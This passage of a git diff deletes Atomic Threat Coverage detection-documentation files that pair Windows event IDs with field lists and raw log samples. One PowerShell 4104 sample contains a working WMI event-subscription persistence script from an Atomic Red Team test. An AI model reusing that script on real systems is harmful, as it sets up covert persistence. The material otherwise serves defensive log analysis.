-    <EventRecordID>41452</EventRecordID>
-    <Correlation/>
-    <Execution ProcessID='692' ThreadID='828'/>
-    <Channel>System</Channel>
-    <Computer>EC2AMAZ-D6OFVS8</Computer>
-    <Security/>
-  </System>
- - <EventData>
-    <Data Name='param1'>Device Install Service</Data>
-    <Data Name='param2'>running</Data>
-    <Binary>44006500760069006300650049006E007300740061006C006C002F0034000000</Binary>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0032_5145_network_share_object_was_accessed_detailed.md b/Atomic_Threat_Coverage/Data_Needed/DN0032_5145_network_share_object_was_accessed_detailed.md
deleted file mode 100644
index 83b46e3..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0032_5145_network_share_object_was_accessed_detailed.md
+++ /dev/null
@@ -1,57 +0,0 @@
-| Title              | DN0032_5145_network_share_object_was_accessed_detailed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Network share object (file or folder) was accessed. Detailed log with  AccessReason and RelativeTargetName |
-| **Logging Policy** | <ul><li>[LP0029_windows_audit_detailed_file_share](../Logging_Policies/LP0029_windows_audit_detailed_file_share.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5145.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5145.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectType</li><li>IpAddress</li><li>IpPort</li><li>ShareName</li><li>ShareLocalPath</li><li>RelativeTargetName</li><li>AccessMask</li><li>AccessList</li><li>AccessReason</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>5145</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12811</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-17T23:54:48.941761700Z" /> 
-    <EventRecordID>267092</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="524" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x38d34</Data> 
-    <Data Name="ObjectType">File</Data> 
-    <Data Name="IpAddress">fe80::31ea:6c3c:f40d:1973</Data> 
-    <Data Name="IpPort">56926</Data> 
-    <Data Name="ShareName">\\\\\*\\Documents</Data> 
-    <Data Name="ShareLocalPath">\\??\\C:\\Documents</Data> 
-    <Data Name="RelativeTargetName">Bginfo.exe</Data> 
-    <Data Name="AccessMask">0x100081</Data> 
-    <Data Name="AccessList">%%1541 %%4416 %%4423</Data> 
-    <Data Name="AccessReason">%%1541: %%1801 D:(A;;FA;;;WD) %%4416: %%1801 D:(A;;FA;;;WD) %%4423: %%1801 D:(A;;FA;;;WD)</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0033_5140_network_share_object_was_accessed.md b/Atomic_Threat_Coverage/Data_Needed/DN0033_5140_network_share_object_was_accessed.md
deleted file mode 100644
index 37856d1..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0033_5140_network_share_object_was_accessed.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0033_5140_network_share_object_was_accessed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Network share object (file or folder) was accessed |
-| **Logging Policy** | <ul><li>[LP0030_windows_audit_file_share](../Logging_Policies/LP0030_windows_audit_file_share.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5140.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5140.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectType</li><li>IpAddress</li><li>IpPort</li><li>ShareName</li><li>ShareLocalPath</li><li>AccessMask</li><li>AccessList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>5140</EventID> 
-    <Version>1</Version> 
-    <Level>0</Level> 
-    <Task>12808</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-18T02:45:13.581231400Z" /> 
-    <EventRecordID>268495</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="772" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x541f35</Data> 
-    <Data Name="ObjectType">File</Data> 
-    <Data Name="IpAddress">10.0.0.100</Data> 
-    <Data Name="IpPort">49212</Data> 
-    <Data Name="ShareName">\\\\\*\\Documents</Data> 
-    <Data Name="ShareLocalPath">\\??\\C:\\Documents</Data> 
-    <Data Name="AccessMask">0x1</Data> 
-    <Data Name="AccessList">%%4416</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0034_104_log_file_was_cleared.md b/Atomic_Threat_Coverage/Data_Needed/DN0034_104_log_file_was_cleared.md
deleted file mode 100644
index d58fcec..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0034_104_log_file_was_cleared.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0034_104_log_file_was_cleared       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows log file was cleared |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://kb.eventtracker.com/evtpass/evtpages/EventId_104_Microsoft-Windows-Eventlog_64337.asp](http://kb.eventtracker.com/evtpass/evtpages/EventId_104_Microsoft-Windows-Eventlog_64337.asp)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-Eventlog    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>Channel</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Eventlog" Guid="{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" /> 
-      <EventID>104</EventID> 
-      <Version>0</Version> 
-      <Level>4</Level> 
-      <Task>104</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8000000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-02-08T22:31:47.796843000Z" /> 
-      <EventRecordID>7659</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="752" ThreadID="1988" /> 
-      <Channel>System</Channel> 
-      <Computer>ATC-WIN-7.atc.local</Computer> 
-      <Security UserID="S-1-5-21-3463664321-2923530833-3546627382-1000" /> 
-    </System>
-  - <UserData>
-    - <LogFileCleared xmlns:auto-ns3="http://schemas.microsoft.com/win/2004/08/events" xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
-        <SubjectUserName>user1</SubjectUserName> 
-        <SubjectDomainName>ATC-WIN-7.atc.local</SubjectDomainName> 
-        <Channel>Application</Channel> 
-        <BackupPath /> 
-      </LogFileCleared>
-    </UserData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0035_106_task_scheduler_task_registered.md b/Atomic_Threat_Coverage/Data_Needed/DN0035_106_task_scheduler_task_registered.md
deleted file mode 100644
index 66557b9..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0035_106_task_scheduler_task_registered.md
+++ /dev/null
@@ -1,46 +0,0 @@
-| Title              | DN0035_106_task_scheduler_task_registered       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | General Windows Task Registration |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc774938(v=ws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc774938(v=ws.10))</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-TaskScheduler/Operational     |
-| **Provider**       | Microsoft-Windows-TaskScheduler    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>TaskName</li><li>UserContext</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-TaskScheduler" Guid="{DE7B24EA-73C8-4A09-985D-5BDADCFA9017}" /> 
-      <EventID>106</EventID> 
-      <Version>0</Version> 
-      <Level>4</Level> 
-      <Task>106</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8000000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-02-08T22:54:14.628673400Z" /> 
-      <EventRecordID>5</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="908" ThreadID="2440" /> 
-      <Channel>Microsoft-Windows-TaskScheduler/Operational</Channel> 
-      <Computer>atc-win-10.atc.local</Computer> 
-      <Security UserID="S-1-5-18" /> 
-    </System>
-  - <EventData Name="TaskRegisteredEvent">
-      <Data Name="TaskName">\atctest</Data> 
-      <Data Name="UserContext">atc-win-10.atc.local\user1</Data> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0036_4104_windows_powershell_script_block.md b/Atomic_Threat_Coverage/Data_Needed/DN0036_4104_windows_powershell_script_block.md
deleted file mode 100644
index c360446..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0036_4104_windows_powershell_script_block.md
+++ /dev/null
@@ -1,49 +0,0 @@
-| Title              | DN0036_4104_windows_powershell_script_block       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event records script |
-| **Logging Policy** | <ul><li>[LP0109_windows_powershell_script_block_logging](../Logging_Policies/LP0109_windows_powershell_script_block_logging.md)</li></ul> |
-| **References**     | <ul><li>[https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/](https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-4104.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-4104.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-PowerShell/Operational     |
-| **Provider**       | Microsoft-Windows-PowerShell    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>MessageNumber</li><li>MessageTotal</li><li>ScriptBlockText</li><li>ScriptBlockId</li><li>Path</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-PowerShell" Guid="{A0C1853B-5C40-4B15-8766-3CF1C58F985A}" /> 
-      <EventID>4104</EventID> 
-      <Version>1</Version> 
-      <Level>5</Level> 
-      <Task>2</Task> 
-      <Opcode>15</Opcode> 
-      <Keywords>0x0</Keywords> 
-      <TimeCreated SystemTime="2019-02-05T15:05:16.554318000Z" /> 
-      <EventRecordID>75823</EventRecordID> 
-      <Correlation ActivityID="{3655DBA0-BD54-0000-AE51-563654BDD401}" /> 
-      <Execution ProcessID="2588" ThreadID="4328" /> 
-      <Channel>Microsoft-Windows-PowerShell/Operational</Channel> 
-      <Computer>atc-win-10.atc.local</Computer> 
-      <Security UserID="S-1-5-21-540864798-2899685673-3651185163-500" /> 
-    </System>
-  - <EventData>
-      <Data Name="MessageNumber">1</Data> 
-      <Data Name="MessageTotal">1</Data> 
-      <Data Name="ScriptBlockText">$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs $FilterToConsumerArgs = @{ Filter = [Ref] $Filter; Consumer = [Ref] $Consumer; } $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs</Data> 
-      <Data Name="ScriptBlockId">414c1110-3b57-40bf-9502-e45053cce9dd</Data> 
-      <Data Name="Path" /> 
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md b/Atomic_Threat_Coverage/Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md
deleted file mode 100644
index c35e3e4..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md
+++ /dev/null
@@ -1,47 +0,0 @@
-| Title              | DN0037_4103_windows_powershell_executing_pipeline       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event records pipeline execution, including variable initialization and command command invocations. |
-| **Logging Policy** | <ul><li>[LP0108_windows_powershell_module_logging](../Logging_Policies/LP0108_windows_powershell_module_logging.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-4103.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-4103.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-PowerShell/Operational     |
-| **Provider**       | Microsoft-Windows-PowerShell    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>ContextInfo</li><li>UserData</li><li>Payload</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-        <Provider Name="Microsoft-Windows-PowerShell" Guid="{A0C1853B-5C40-4B15-8766-3CF1C58F985A}" /> 
-        <EventID>4103</EventID> 
-        <Version>1</Version> 
-        <Level>4</Level> 
-        <Task>106</Task> 
-        <Opcode>20</Opcode> 
-        <Keywords>0x0</Keywords> 
-        <TimeCreated SystemTime="2019-02-05T15:05:16.564146000Z" /> 
-        <EventRecordID>75824</EventRecordID> 
-        <Correlation ActivityID="{3655DBA0-BD54-0000-AF51-563654BDD401}" /> 
-        <Execution ProcessID="2588" ThreadID="4328" /> 
-        <Channel>Microsoft-Windows-PowerShell/Operational</Channel> 
-        <Computer>atc-win-10.atc.local</Computer> 
-        <Security UserID="S-1-5-21-540864798-2899685673-3651185163-500" /> 
-      </System>
-    - <EventData>
-        <Data Name="ContextInfo">Severity = Informational Host Name = ConsoleHost Host Version = 5.1.17134.407 Host ID = 3ff2018b-ab29-4049-a62d-851e5ca931ed Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Engine Version = 5.1.17134.407 Runspace ID = 52c750e1-1c34-4244-a6eb-feadfd70a959 Pipeline ID = 90 Command Name = New-CimInstance Command Type = Cmdlet Script Name = Command Path = Sequence Number = 329 User = atc-win-10\user1 Connected User = Shell ID = Microsoft.PowerShell</Data> 
-        <Data Name="UserData" /> 
-        <Data Name="Payload">CommandInvocation(New-CimInstance): "New-CimInstance" ParameterBinding(New-CimInstance): name="Namespace"; value="root/subscription" ParameterBinding(New-CimInstance): name="ClassName"; value="__EventFilter" ParameterBinding(New-CimInstance): name="Property"; value="System.Collections.Hashtable"</Data> 
-      </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0038_400_engine_state_is_changed_from_none_to_available.md b/Atomic_Threat_Coverage/Data_Needed/DN0038_400_engine_state_is_changed_from_none_to_available.md
deleted file mode 100644
index 81eae9b..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0038_400_engine_state_is_changed_from_none_to_available.md
+++ /dev/null
@@ -1,42 +0,0 @@
-| Title              | DN0038_400_engine_state_is_changed_from_none_to_available       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Information about PowerShell engine state. Engine state is changed from None to Available |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-400.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/powershell/events/event-400.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Windows PowerShell     |
-| **Provider**       | PowerShell    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="PowerShell" /> 
-      <EventID Qualifiers="0">400</EventID> 
-      <Level>4</Level> 
-      <Task>4</Task> 
-      <Keywords>0x80000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-02-05T15:13:04.885878700Z" /> 
-      <EventRecordID>50575</EventRecordID> 
-      <Channel>Windows PowerShell</Channel> 
-      <Computer>atc-win-10.atc.local</Computer> 
-      <Security /> 
-    </System>
-  - <EventData>
-      <Data>Available</Data> 
-      <Data>None</Data> 
-      <Data>NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=Windows PowerShell ISE Host HostVersion=5.1.17134.407 HostId=9478b487-c2ea-4aa8-8eb3-9b7bad25b39f HostApplication=C:\windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe EngineVersion=5.1.17134.407 RunspaceId=9f89fa00-ca26-402e-9dea-29c6d2447f7b PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=</Data> 
-    </EventData>
-  </Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0039_524_system_catalog_has_been_deleted.md b/Atomic_Threat_Coverage/Data_Needed/DN0039_524_system_catalog_has_been_deleted.md
deleted file mode 100644
index f23b227..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0039_524_system_catalog_has_been_deleted.md
+++ /dev/null
@@ -1,43 +0,0 @@
-| Title              | DN0039_524_system_catalog_has_been_deleted       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The System Catalog has been deleted |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://kb.eventtracker.com/evtpass/evtpages/EventId_524_Microsoft-Windows-Backup_61998.asp](http://kb.eventtracker.com/evtpass/evtpages/EventId_524_Microsoft-Windows-Backup_61998.asp)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Application     |
-| **Provider**       | Microsoft-Windows-Backup    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Backup" Guid="{1DB28F2E-8F80-4027-8C5A-A11F7F10F62D}" /> 
-    <EventID>524</EventID> 
-    <Version>0</Version> 
-    <Level>4</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-16T22:38:38.762505900Z" /> 
-    <EventRecordID>457</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3476" ThreadID="1732" /> 
-    <Channel>Application</Channel> 
-    <Computer>atc-win-2k12.atc.lab</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  <EventData /> 
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0040_528_user_successfully_logged_on_to_a_computer.md b/Atomic_Threat_Coverage/Data_Needed/DN0040_528_user_successfully_logged_on_to_a_computer.md
deleted file mode 100644
index f9c0042..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0040_528_user_successfully_logged_on_to_a_computer.md
+++ /dev/null
@@ -1,40 +0,0 @@
-| Title              | DN0040_528_user_successfully_logged_on_to_a_computer       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | User successfully logged on to a computer |
-| **Logging Policy** | <ul><li>[LP0004_windows_audit_logon](../Logging_Policies/LP0004_windows_audit_logon.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=528](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=528)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>UserName</li><li>Domain</li><li>LogonID</li><li>LogonType</li><li>LogonProcess</li><li>AuthenticationPackage</li><li>WorkstationName</li><li>LogonGUID</li><li>CallerUserName</li><li>CallerDomain</li><li>CallerLogonID</li><li>CallerProcessID</li><li>TransitedServices</li><li>SourceNetworkAddress</li><li>SourcePort</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-2019-07-15 21:44:17 ATC AUDIT_SUCCESS 528 ATC\Administrator Successful Logon:
-  User Name:  Administrator
-  Domain:   ATC
-  Logon ID:   (0x0,0x5A53F)
-  Logon Type: 2
-  Logon Process:  User32  
-  Authentication Package: Negotiate
-  Workstation Name: ATC
-  Logon GUID: -
-  Caller User Name: ATC$
-  Caller Domain:  WORKGROUP
-  Caller Logon ID:  (0x0,0x3E7)
-  Caller Process ID: 380
-  Transited Services: -
-  Source Network Address: 127.0.0.1
-  Source Port:  0
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0041_529_logon_failure.md b/Atomic_Threat_Coverage/Data_Needed/DN0041_529_logon_failure.md
deleted file mode 100644
index 2bf3792..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0041_529_logon_failure.md
+++ /dev/null
@@ -1,39 +0,0 @@
-| Title              | DN0041_529_logon_failure       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Logon Failure - Unknown user name or bad password |
-| **Logging Policy** | <ul><li>[LP0004_windows_audit_logon](../Logging_Policies/LP0004_windows_audit_logon.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=529](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=529)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>Reason</li><li>UserName</li><li>Domain</li><li>LogonType</li><li>LogonProcess</li><li>AuthenticationPackage</li><li>WorkstationName</li><li>CallerUserName</li><li>CallerDomain</li><li>CallerLogonID</li><li>CallerProcessID</li><li>TransitedServices</li><li>SourceNetworkAddress</li><li>SourcePort</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-2019-07-15 22:00:20 ATC AUDIT_FAILURE 529 NT AUTHORITY\SYSTEM Logon Failure:
-  Reason:   Unknown user name or bad password
-  User Name:  asdfasd
-  Domain:   ATC
-  Logon Type: 10
-  Logon Process:  User32  
-  Authentication Package: Negotiate
-  Workstation Name: ATC
-  Caller User Name: ATC$
-  Caller Domain:  WORKGROUP
-  Caller Logon ID:  (0x0,0x3E7)
-  Caller Process ID:  3064
-  Transited Services: -
-  Source Network Address: 192.168.88.198
-  Source Port:  52013
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0042_675_kerberos_preauthentication_failed.md b/Atomic_Threat_Coverage/Data_Needed/DN0042_675_kerberos_preauthentication_failed.md
deleted file mode 100644
index 233d912..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0042_675_kerberos_preauthentication_failed.md
+++ /dev/null
@@ -1,31 +0,0 @@
-| Title              | DN0042_675_kerberos_preauthentication_failed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Kerberos pre-authentication failed |
-| **Logging Policy** | <ul><li>[LP0004_windows_audit_logon](../Logging_Policies/LP0004_windows_audit_logon.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=675](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=675)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>UserName</li><li>UserID</li><li>UserSid</li><li>ServiceName</li><li>PreAuthenticationType</li><li>FailureCode</li><li>ClientAddress</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-2019-07-18 00:56:03 ATC AUDIT_FAILURE 675 NT AUTHORITY\SYSTEM Pre-authentication failed:
-  User Name:  Administrator
-  User ID:    %{S-1-5-21-3160476663-3818360063-188177334-500}
-  Service Name: krbtgt/DC
-  Pre-Authentication Type:  0x2
-  Failure Code: 0x18
-  Client Address: 127.0.0.1
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0043_770_dns_server_plugin_dll_has_been_loaded.md b/Atomic_Threat_Coverage/Data_Needed/DN0043_770_dns_server_plugin_dll_has_been_loaded.md
deleted file mode 100644
index 160eb27..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0043_770_dns_server_plugin_dll_has_been_loaded.md
+++ /dev/null
@@ -1,46 +0,0 @@
-| Title              | DN0043_770_dns_server_plugin_dll_has_been_loaded       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows DNS server plug-in DLL has been loaded |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html](https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | DNS Server     |
-| **Provider**       | Microsoft-Windows-DNS-Server-Service    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DNS-Server-Service" Guid="{71A551F5-C893-4849-886B-B5EC8502641E}" /> 
-    <EventID>770</EventID> 
-    <Version>0</Version> 
-    <Level>4</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000008000</Keywords> 
-    <TimeCreated SystemTime="2017-05-09T08:54:26.798142300Z" /> 
-    <EventRecordID>264</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="2312" ThreadID="3068" /> 
-    <Channel>DNS Server</Channel> 
-    <Computer>dc1.lab.internal</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
